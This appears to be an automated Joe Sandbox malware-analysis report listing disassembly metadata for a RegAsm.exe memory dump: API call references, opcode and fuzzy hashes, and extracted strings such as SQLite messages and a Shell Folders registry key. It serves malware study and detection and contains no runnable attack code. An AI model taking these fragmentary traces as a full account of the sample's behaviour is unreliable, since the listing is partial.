                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintfwcscpy
                                                                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                              • API String ID: 999028693-502967061
                                                                                                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                              APIs
                                                                                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                              • memset.MSVCRT ref: 00408E46
                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$memsetstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2350177629-0
                                                                                                                                              • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                              • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                              • API String ID: 2221118986-1606337402
                                                                                                                                              • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                              • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                              APIs
                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                              • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                              • memset.MSVCRT ref: 00408FD4
                                                                                                                                              • memcmp.MSVCRT ref: 00409025
                                                                                                                                              • memset.MSVCRT ref: 00409042
                                                                                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 265355444-0
                                                                                                                                              • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                              • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4131475296-0
                                                                                                                                              • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                              • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFilefreememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2507021081-0
                                                                                                                                              • Opcode ID: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                              • Opcode Fuzzy Hash: 4b39cef6f19030deb93fe73f67a1ed4f2de523a71059e199493297a9b5600ca9
                                                                                                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                              APIs
                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                              • malloc.MSVCRT ref: 00417524
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                              • free.MSVCRT ref: 00417544
                                                                                                                                              • free.MSVCRT ref: 00417562
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4131324427-0
                                                                                                                                              • Opcode ID: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                              • Opcode Fuzzy Hash: 57b08e0afea0ce6944352db5cfd1372888f4bdadf73f296c46880c7ddd44ae0d
                                                                                                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                              APIs
                                                                                                                                              • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                              • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                              • free.MSVCRT ref: 0041822B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PathTemp$free
                                                                                                                                              • String ID: %s\etilqs_$etilqs_
                                                                                                                                              • API String ID: 924794160-1420421710
                                                                                                                                              • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                              • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                              • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                              • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                              • API String ID: 1775345501-2769808009
                                                                                                                                              • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                              • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                              • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                              • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastMessage_snwprintf
                                                                                                                                              • String ID: Error$Error %d: %s
                                                                                                                                              • API String ID: 313946961-1552265934
                                                                                                                                              • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                              • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                              • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                              • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                              • API String ID: 0-1953309616
                                                                                                                                              • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                              • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                              • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                              • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                              • API String ID: 3510742995-272990098
                                                                                                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0044A6EB
                                                                                                                                              • memset.MSVCRT ref: 0044A6FB
                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: gj
                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                              • free.MSVCRT ref: 0040E9D3
                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2241099983-0
                                                                                                                                              • Opcode ID: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                              • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                              • Opcode Fuzzy Hash: 9dde93f155bc57f068176677874d89208783a1ee477747775cc83fd265c4fbdd
                                                                                                                                              • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                              APIs
                                                                                                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                              • malloc.MSVCRT ref: 004174BD
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                              • free.MSVCRT ref: 004174E4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4053608372-0
                                                                                                                                              • Opcode ID: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                              • Opcode Fuzzy Hash: d5ff2a264155eb9e3ce85c6bda5726e1366a88793ef295ade9d945fa0d444da7
                                                                                                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 0040D453
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                              • memset.MSVCRT ref: 004450CD
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1471605966-0
                                                                                                                                              • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                              • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                              APIs
                                                                                                                                              • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                              • wcscat.MSVCRT ref: 0044476E
                                                                                                                                              • wcscat.MSVCRT ref: 0044477F
                                                                                                                                              • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                              • String ID: \StringFileInfo\
                                                                                                                                              • API String ID: 102104167-2245444037
